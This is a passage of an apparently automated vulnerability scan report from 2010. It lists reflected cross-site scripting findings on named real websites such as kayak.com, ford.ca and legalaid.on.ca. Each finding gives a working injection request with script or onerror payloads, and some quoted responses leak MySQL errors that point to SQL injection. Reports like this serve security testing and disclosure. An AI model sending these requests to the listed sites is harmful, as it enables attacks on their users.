Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.php?f=g85c5a</script><script>alert(1)</script>6077bb4736d&kw=Adecco%20jobs HTTP/1.1 Host: www.findmylocaljob.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <LINK REL="SHORTCUT ICON" H ...[SNIP]... if (!areYouReallySure && !internalLink && !properClickThrough) { window.onbeforeunload = null; //alert('Wait!'); window.location = 'search_results.php?f=rg85c5a</script><script>alert(1)</script>6077bb4736d&q=Adecco jobs&l=Houston, TX'; return "**********************************\n\nWait Before you go...\n\nClick *CANCEL* to see your job search results right away!\n\n************************ ...[SNIP]...
The value of the f request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28431"><script>alert(1)</script>e91b65c3cd6 was submitted in the f parameter. This input was echoed as 28431\"><script>alert(1)</script>e91b65c3cd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /profile.php?f=g28431"><script>alert(1)</script>e91b65c3cd6&kw=Adecco%20jobs HTTP/1.1 Host: www.findmylocaljob.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f63fd</script><script>alert(1)</script>2190c6a7f52 was submitted in the kw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.php?f=g&kw=Adecco%20jobsf63fd</script><script>alert(1)</script>2190c6a7f52 HTTP/1.1 Host: www.findmylocaljob.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <LINK REL="SHORTCUT ICON" H ...[SNIP]... uReallySure && !internalLink && !properClickThrough) { window.onbeforeunload = null; //alert('Wait!'); window.location = 'search_results.php?f=rg&q=Adecco jobsf63fd</script><script>alert(1)</script>2190c6a7f52&l=Houston, TX'; return "**********************************\n\nWait Before you go...\n\nClick *CANCEL* to see your job search results right away!\n\n**********************************";
The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26c1"><script>alert(1)</script>9a6b24d105 was submitted in the kw parameter. This input was echoed as c26c1\"><script>alert(1)</script>9a6b24d105 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /profile.php?f=g&kw=Adecco%20jobsc26c1"><script>alert(1)</script>9a6b24d105 HTTP/1.1 Host: www.findmylocaljob.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <LINK REL="SHORTCUT ICON" H ...[SNIP]... <INPUT maxLength="512" value="Adecco jobsc26c1\"><script>alert(1)</script>9a6b24d105" id="what" name="q"> ...[SNIP]...
2.214. http://www.findmylocaljob.net/profile.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.findmylocaljob.net
Path:
/profile.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73ba4"><script>alert(1)</script>3dc155e170b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73ba4\"><script>alert(1)</script>3dc155e170b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /profile.php?f=g&kw=Adecco%20/73ba4"><script>alert(1)</script>3dc155e170bjobs HTTP/1.1 Host: www.findmylocaljob.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <LINK REL="SHORTCUT ICON" H ...[SNIP]... <INPUT maxLength="512" value="Adecco /73ba4\"><script>alert(1)</script>3dc155e170bjobs" id="what" name="q"> ...[SNIP]...
2.215. http://www.findmylocaljob.net/profile.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.findmylocaljob.net
Path:
/profile.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0574</script><script>alert(1)</script>f521c798b0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.php?f=g&kw=Adecco%20/c0574</script><script>alert(1)</script>f521c798b0fjobs HTTP/1.1 Host: www.findmylocaljob.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 5 is copied into an HTML comment. The payload 534eb--><img%20src%3da%20onerror%3dalert(1)>764845d81ca was submitted in the REST URL parameter 5. This input was echoed as 534eb--><img src=a onerror=alert(1)>764845d81ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /app/fo/en/parts_and_services/offers534eb--><img%20src%3da%20onerror%3dalert(1)>764845d81ca/works.do HTTP/1.1 Host: www.ford.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Content-Type: text/html; charset=UTF-8 Content-Language: en-US Date: Thu, 25 Nov 2010 05:27:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=00008UIJUTroUL17HJdx_ZSOBqh:136vm3ur9; Path=/ Set-Cookie: language=en_CA; Expires=Fri, 25 Nov 2011 05:27:00 GMT; Path=/ Set-Cookie: viewedVehicles=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: customer=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: driver=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Content-Length: 87463
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="ht ...[SNIP]... <!--Raw Page key = parts.offers534eb--><img src=a onerror=alert(1)>764845d81ca.works--> ...[SNIP]...
The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceeb5"><script>alert(1)</script>331ebf2fbf0 was submitted in the kw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fa=landing.CAO_1a&mnc=1293&kw=Harlequin%20NFH%20Onlineceeb5"><script>alert(1)</script>331ebf2fbf0&utm_source=GDC&utm_medium=banner&utm_term=Harlequin%20NFH%20Online&utm_content=CAO_1a&utm_campaign=CAO/ HTTP/1.1 Host: www.fullsail.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the ID request parameter is copied into the HTML document as plain text between tags. The payload 63ecc<script>alert(1)</script>57716fed1d8 was submitted in the ID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi/cdnlaw/jump.cgi?ID=16863ecc<script>alert(1)</script>57716fed1d8 HTTP/1.1 Host: www.gahtan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 05:27:31 GMT Server: Apache Vary: Accept-Encoding Content-Length: 64 Connection: close Content-Type: text/plain
2.219. http://www.getdecorating.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.getdecorating.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96969"><a>47758afb9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?96969"><a>47758afb9f=1 HTTP/1.1 Host: www.getdecorating.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:30:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=1676292;expires=Sat, 17-Nov-2040 05:30:13 GMT;path=/ Set-Cookie: CFTOKEN=28129679;expires=Sat, 17-Nov-2040 05:30:13 GMT;path=/ Set-Cookie: CFID=1676292;path=/ Set-Cookie: CFTOKEN=28129679;path=/ Content-Language: en-US Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml ...[SNIP]... <a href="/default.cfm?96969"><a>47758afb9f=1&lang=es"> ...[SNIP]...
The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 484e0<a>17bffb3590c was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /directory.php?name=Consulting&categoryId=228484e0<a>17bffb3590c HTTP/1.1 Host: www.halifaxkiosk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 05:27:55 GMT Server: Apache/1.3.41 (Unix) PHP/5.2.8 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.8 Connection: close Content-Type: text/html Content-Length: 1335
mysql error: [1054: Unknown column 'a' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 228484e0<a>17bffb3590c ORDER BY name ASC") <pre align=left> &n ...[SNIP]...
The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 5a7ce<a>14a91f0024d was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /directory.php?name=Consulting&categoryId=2285a7ce<a>14a91f0024d HTTP/1.1 Host: www.hamiltonkiosk.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 05:28:01 GMT Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.0 Connection: close Content-Type: text/html Content-Length: 1342
mysql error: [1054: Unknown column '2285a7ce' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 2285a7ce<a>14a91f0024d ORDER BY name ASC") <pre align=left> &nb ...[SNIP]...
2.222. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.hotelsoup.com
Path:
/hotel.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6baa7"><script>alert(1)</script>7dd6a604caf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hotel.php?6baa7"><script>alert(1)</script>7dd6a604caf=1 HTTP/1.1 Host: www.hotelsoup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.223. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.hotelsoup.com
Path:
/hotel.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a0df'><script>alert(1)</script>9c29eafabc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hotel.php?4a0df'><script>alert(1)</script>9c29eafabc6=1 HTTP/1.1 Host: www.hotelsoup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb928'%3b029bccb30a5 was submitted in the REST URL parameter 1. This input was echoed as cb928';029bccb30a5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cb928'%3b029bccb30a5 HTTP/1.1 Host: www.ihirequalitycontrol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<TITLE>cb928';029bccb30a5 on iHireQualityControl.com</TITLE> <META NAME="ROBOTS" CONTENT="index,follow"> <META NAME ...[SNIP]... <script type="text/javascript"> s.pageType = "errorPage"; s.pageName = '404;http://www.ihirequalitycontrol.com:80/cb928';029bccb30a5'; </script> ...[SNIP]...
2.225. http://www.jobboom.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.jobboom.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a2dd"><script>alert(1)</script>c82b05ef1d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?6a2dd"><script>alert(1)</script>c82b05ef1d6=1 HTTP/1.1 Host: www.jobboom.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d2aa"><script>alert(1)</script>2c3302300fd was submitted in the REST URL parameter 1. This input was echoed as 7d2aa\"><script>alert(1)</script>2c3302300fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /code7d2aa"><script>alert(1)</script>2c3302300fd/sortable-table/. HTTP/1.1 Host: www.joostdevalk.nl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 25 Nov 2010 05:29:23 GMT Server: LiteSpeed Connection: close Set-Cookie: PHPSESSID=e3ba843388528fe3cfe0fb71ab6ac294; path=/ Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Powered-By: W3 Total Cache/0.9.1.2 Last-Modified: Thu, 25 Nov 2010 05:29:23 GMT Vary: Cookie Expires: Thu, 25 Nov 2010 06:29:23 GMT X-Pingback: http://yoast.com/xmlrpc.php Content-Type: text/html; charset=utf-8 Vary: User-Agent Content-Length: 14472
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile="http:// ...[SNIP]... <input type="hidden" value="http://www.joostdevalk.nl/code7d2aa\"><script>alert(1)</script>2c3302300fd/sortable-table/./" name="MMERGE6" class="" id="mce-MMERGE6"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93246"><script>alert(1)</script>f4145b3bd95 was submitted in the REST URL parameter 2. This input was echoed as 93246\"><script>alert(1)</script>f4145b3bd95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /code/sortable-table93246"><script>alert(1)</script>f4145b3bd95/. HTTP/1.1 Host: www.joostdevalk.nl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 25 Nov 2010 05:29:28 GMT Server: LiteSpeed Connection: close Set-Cookie: PHPSESSID=314fa16cad38be433376836d0ba4bcb3; path=/ Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Powered-By: W3 Total Cache/0.9.1.2 Last-Modified: Thu, 25 Nov 2010 05:29:27 GMT Vary: Cookie Expires: Thu, 25 Nov 2010 06:29:28 GMT X-Pingback: http://yoast.com/xmlrpc.php Content-Type: text/html; charset=utf-8 Vary: User-Agent Content-Length: 14472
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile="http:// ...[SNIP]... <input type="hidden" value="http://www.joostdevalk.nl/code/sortable-table93246\"><script>alert(1)</script>f4145b3bd95/./" name="MMERGE6" class="" id="mce-MMERGE6"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 812e2"><script>alert(1)</script>a01aa50342c was submitted in the REST URL parameter 3. This input was echoed as 812e2\"><script>alert(1)</script>a01aa50342c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /code/sortable-table/.812e2"><script>alert(1)</script>a01aa50342c HTTP/1.1 Host: www.joostdevalk.nl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 25 Nov 2010 05:29:32 GMT Server: LiteSpeed Connection: close Set-Cookie: PHPSESSID=4384e891dadf8af119676603a3140c2e; path=/ Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Powered-By: W3 Total Cache/0.9.1.2 Last-Modified: Thu, 25 Nov 2010 05:29:32 GMT Vary: Cookie Expires: Thu, 25 Nov 2010 06:29:32 GMT X-Pingback: http://yoast.com/xmlrpc.php Content-Type: text/html; charset=utf-8 Vary: User-Agent Content-Length: 14472
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile="http:// ...[SNIP]... <input type="hidden" value="http://www.joostdevalk.nl/code/sortable-table/.812e2\"><script>alert(1)</script>a01aa50342c/" name="MMERGE6" class="" id="mce-MMERGE6"/> ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload b070c<script>alert(1)</script>659eda8a771 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /in?ai=&p=&url=b070c<script>alert(1)</script>659eda8a771 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbbb7"><script>alert(1)</script>919e2b748f2 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /in?ai=&p=&url=%2Fh%2Fbuzz%2Fview%3Fac%3D%26action%3Dcreate%26airport%3DBOS%26code%3DBOS%26dt%3DA%26t%3D%26mc%3DUSD%26dest1%3DLAS%26desthint1%3DLAS\u003c/link\u003e\ndbbb7"><script>alert(1)</script>919e2b748f2 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload d09c3<a>03a0a334d8f was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /directory.php?name=Consulting&categoryId=228d09c3<a>03a0a334d8f HTTP/1.1 Host: www.kelownakiosk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 05:30:06 GMT Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.0 Connection: close Content-Type: text/html Content-Length: 1342
mysql error: [1054: Unknown column '228d09c3' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 228d09c3<a>03a0a334d8f ORDER BY name ASC") <pre align=left> &nb ...[SNIP]...
The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 3cd87<a>b1a50f84d9c was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /directory.php?name=Consulting&categoryId=2283cd87<a>b1a50f84d9c HTTP/1.1 Host: www.kitchenerkiosk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 05:30:19 GMT Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.0 Connection: close Content-Type: text/html Content-Length: 1342
mysql error: [1054: Unknown column '2283cd87' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 2283cd87<a>b1a50f84d9c ORDER BY name ASC") <pre align=left> &nb ...[SNIP]...
2.233. http://www.legalaid.on.ca/en/getting/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.legalaid.on.ca
Path:
/en/getting/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79e76"><script>alert(1)</script>8d7ae6731a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/getting/?79e76"><script>alert(1)</script>8d7ae6731a4=1 HTTP/1.1 Host: www.legalaid.on.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:35:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 22813 Content-Type: text/html Set-Cookie: ASPSESSIONIDCACRTTTQ=FBCIOELCHEOHEPMFEGLBLPAF; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Legal Aid Ontario: Getting Legal Help</title>
2.234. http://www.legalaid.on.ca/en/getting/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.legalaid.on.ca
Path:
/en/getting/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4184a--><script>alert(1)</script>98c3684d0d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en/getting/?4184a--><script>alert(1)</script>98c3684d0d0=1 HTTP/1.1 Host: www.legalaid.on.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 05:35:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 22815 Content-Type: text/html Set-Cookie: ASPSESSIONIDCACRTTTQ=IBCIOELCEKFJMEIMOGHLFMGN; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Legal Aid Ontario: Getting Legal Help</title>
The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 3ff76<a>f6acfe1ed56 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /directory.php?name=Consulting&categoryId=2283ff76<a>f6acfe1ed56 HTTP/1.1 Host: www.londonkiosk.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 05:36:26 GMT Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.0 Connection: close Content-Type: text/html Content-Length: 1342
mysql error: [1054: Unknown column '2283ff76' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 2283ff76<a>f6acfe1ed56 ORDER BY name ASC") <pre align=left> &nb ...[SNIP]...
